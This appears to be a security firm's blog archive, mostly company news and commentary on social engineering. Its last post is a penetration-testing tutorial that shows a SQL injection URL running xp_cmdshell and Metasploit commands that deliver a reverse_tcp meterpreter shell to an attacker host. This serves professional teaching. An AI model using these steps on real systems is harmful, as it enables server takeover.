Archive for the ‘SECFORCE’ Category
Is traditional penetration testing effective at identifying risk?
Friday, December 14th, 2012
This September the Director General of GCHQ wrote to many business leaders providing them with a top ten list of priorities for achieving and maintaining a strong resilience to cyber attack.
The challenge for many board members is how to ascertain the validity of what they are being told in relation to the health of their defences. What unknown risks are being carried? There is a high risk of false assurance from internal departments reporting up the chain.
What is the state is your business in when it comes to cyber security?
Ask yourself the following questions;
· How effective are my perimeter defences?
· How much business impact can an anonymous attacker cause on my network?
· What is state of health of my internal systems and networks?
· What level of security awareness is held my staff?
· How effective are my IT and security team are at identifying and mitigating an attack?
If you are sure you know the answer and you are happy with it then you are doing well.
Many of the security assessments we are asked to undertake, although providing value, miss the point when it comes to identifying key risks. The reason is that an advanced and sophisticated attacker would not play by the rules set out in a typical test engagement. If I wanted to attack your organisation, I would carefully target your people, compromise their browsers, infiltrate their laptops or workstations, and from there begin to slowly gain a foothold and control of your network. In my 10 years working at the cutting edge of penetration testing, we have performed this testing but a handful of times; however the majority of successful extrusion attacks would use this method.
There is a miss-match therefore – the skills exist to measure organisations resilience to this form of attack method, the majority of successful breaches would use this technique, but penetration tests typically do not cater for this form of scenario.
A realistic attack would take the form of a discrete engagement to identify and quantify key areas of critical risk - We like to call it offensive security; the best form of defence is to know what the enemy are capable of. If you want to know the truth then you need to test combining the following elements;
· Physical – how easy would it be for an individual to gain access one of your premises/gain access to the network/steal a laptop, PDA device or similar (and attempt to extract the data) Can a remote access device be planted and will this go unnoticed?
· Technical– can your systems be penetrated? How effective are your perimeter and internal controls?
· Social – can your people be easily compromised, what level of control over your systems, data and networks can be achieved?
So to ask the question again – how well equipped are you for fending off an advanced and persistent cyber attack?
SECFORCE presented at the IGEM conference
Wednesday, November 14th, 2012
The gas and energy sectors face significant challenges in regard to IT security. An evolving industry where reliance on IT systems has become key, being a potential target of terrorism attacks and where high availability and business continuity is a must, IT security shouldn’t be overlooked.
SECFORCE presented the challenges faced by Gas and Energy corporations in the IGEM annual conference:
The talk provided an overview of the threats of the companies in the energy sector, the current threats affecting SCADA systems, attackers’ motivations and a roadmap towards an increase on security.
Should you protect your identify from cybercriminals and would be penetration testers?
Monday, October 29th, 2012
Andy Smith, an internet security chief at the Cabinet Office, has said people should only give accurate details to trusted sites such as government ones. (http://www.bbc.co.uk/news/uk-politics-20082493)
Giving fake details to social networking sites is “a very sensible thing to do”
The reason for this is the high volume of websites that ask for highly privileged information such as date birth on their users where this information is not strictly necessary. Because of the vast number of websites involved, the overall challenge of keeping an individual’s information confidential is becoming virtually impossible.
As an individual working for a well respected penetration testing company I see the effects of this on a daily basis when SECFORCE are asked to perform social engineering attacks and client side browser exploitation against unsuspecting company employees. For us, without the rich source of information leakage on organisation’s employees in social media and other websites, our job of either tricking the user, or using their identity to trick others would be much harder.
The trick with a client side attack is to encourage an individual to perform an action of some kind, the chances of this being successful are increased a thousand fold if you use specific information pertaining to that user that puts them at ease, and elevates their misplaced trust in you - ‘the attacker’. This is why social media is so powerful – a message from a friend on Facebook, an email from a colleague on LinkedIn, each containing a specific piece of information (for example a happy birthday message on your birthday), and prompting an action to click or download such as - here is a picture of your daughter from the party last weekend, or good luck with the presentation today.
Messages that are backed by some truth and privileged information are likely to result in the desired result (compromise of the user).
Cyber criminals have exactly the same access to this information as legitimate penetration testers and they are putting it to good use. Client side browser attacks are exponentially increasing. The attacker’s goal is often being to form a bridgehead into an organisation for further significant impact. This form of attack can be sustained against an organisation and its employees for a period of months, so the odds of success are on the side of the attacker, and the only real countermeasures are the awareness and vigilance of your employees.
So, is Andy Smith from the Cabinet Office correct to give this advice? It is clear that there are a number of challenges to protect an individual’s identity online, however at the same time, websites such as Facebook, Twitter and LinkedIn as well as the hundreds of others that store information on you are here to stay. We are at a point of transition, not fully equipped or aware of the risks our online behaviour expose us to, but at the same time reliant on the benefits this new technology brings to our lives.
SECFORCE achieves ISO27001:2005
Thursday, October 11th, 2012
SECFORCE has been accredited to ISO27001:2005 by the British Assessment Bureau.
SECFORCE’s Operations and Commercial Director Sam Temple said:
“This marks an important milestone for us in security management. It is one thing to strive to operate in a secure manner, but fantastic to have it confirmed by a respected external auditing body. Having achieved ISO27001 will not mean that we can relax about our security though, although we can be confident that the systems and procedures put in place are effective now, we will continue to invest effort in to this area to ensure that they remain so. ”
SECFORCE handles confidential information in a daily basis. This achievement contributes to ensure that our client’s information is kept secure.
SECFORCE Presents to European Banking Industry in Riederau
Wednesday, October 3rd, 2012
SECFORCE Technical Director, Rodrigo Marcos, impressed bankers at an IT Cyber-Security workshop in Germany on Tuesday treating them to a live hacking demonstration. The presentation comes as financial institutions focus more and more on how to foil the dangerous and cutting-edge cyber criminals hiding behind their computer screens around the globe.
During the two day conference Marcos demonstrated how an unsuspecting online banking customer could be targeted and their life-savings stolen without them even noticing that their browser had been compromised.
“It is not common to see competitors in the same industry sharing information security knowledge and organising events like this one. To my mind, it clearly shows the increasing security awareness in the market today.” said Rodrigo Marcos.
The experienced ethical hacker also advised the banks to provide more security tips to their customers such as opening a new browser session when conducting online banking.
Proxyfuzz fuzzer RPM binary
Thursday, September 22nd, 2011
Proxyfuzz is now available in RPM format for Fedora users. Petr Sklenar has created and uploaded the RPM version, available for download here.
Source code and windows binaries can still be found in the security research section of our website.
Proxyfuzz is a protocol agnostic fuzzer which randomly fuzzes network traffic following a man-in-the-middle approach. The tool is designed to randomly inject a number of fuzzing signatures to the data that goes through it. It is incredibly easy to set up and can be used to research any TCP and UDP protocol.
SECFORCE is now CREST certified
Monday, July 25th, 2011
As part of the SECFORCE commitment to ensuring the provision of high quality services, SECFORCE has now achieved CREST certification. This will further complement the strong existing methodology and work of ethics.
SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied.
CREST Penetration Testing
“CREST is a not for profit organisation which brings a demonstrable level of expertise and professionalism to security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST and those that do, like SECFORCE, have had to demonstrated the processes they utilise for testing are sound, they have adopted industry best practice in their approach to testing and they handle sensitive client information in an appropriate manner.”
Ian Glover, President of CREST
The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship.
“We are really pleased that CREST certification has been achieved and view this as an important step forward in the continue enhancement of our service delivery”
Rodrigo Marcos, Technical Services Director
For more information about our CREST assessments and discover how we can benefit your organization, please visit our CREST penetration testing page.
SECFORCE invited to present at Athcon
Saturday, June 18th, 2011
SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011.
AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts.
SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.
The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.
You can download the slides from the talk from our security research area.
SECFORCE achieves quality management ISO 9001 certification
Wednesday, April 6th, 2011
SECFORCE has achieved recognition for its quality management systems with the award of ISO 9001:2008.
The certification recognises the company’s commitment to quality management systems used in the delivery of IT security services to SECFORCE customers and to continuous improvement processes and procedures.
For customers this achievement will enhance their confidence in the high quality of SECFORCE’s services and will guarantee a more efficient and effective business operation, increasing customer satisfaction. As quality is constantly measured and procedures ensure corrective actions are taken whenever defects occur, our clients will be benefited by an ever increasing excellent service.
Certification was awarded by The British Assessment Bureau, a UKAS accredited authority, by a series of independent audits.
Exploiting SQL injection vulnerabilities with Metasploit
Thursday, January 27th, 2011
In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker.
Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;–
If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.
The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.
It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:
msf > use windows/mssql/mssql_payload_sqli
msf exploit(mssql_payload_sqli) >
set GET_PATH http://192.168.1.66/
GET_PATH => http://192.168.1.66/
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
msf exploit(mssql_payload_sqli) >
set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64
LHOST => 192.168.1.64
msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80
msf exploit(mssql_payload_sqli) > exploit
After the exploitation the attacker will get a meterpreter shell.
SQL injection exploitation with Metasploit
If you want to use this code you can download it from Secforce security tools repository.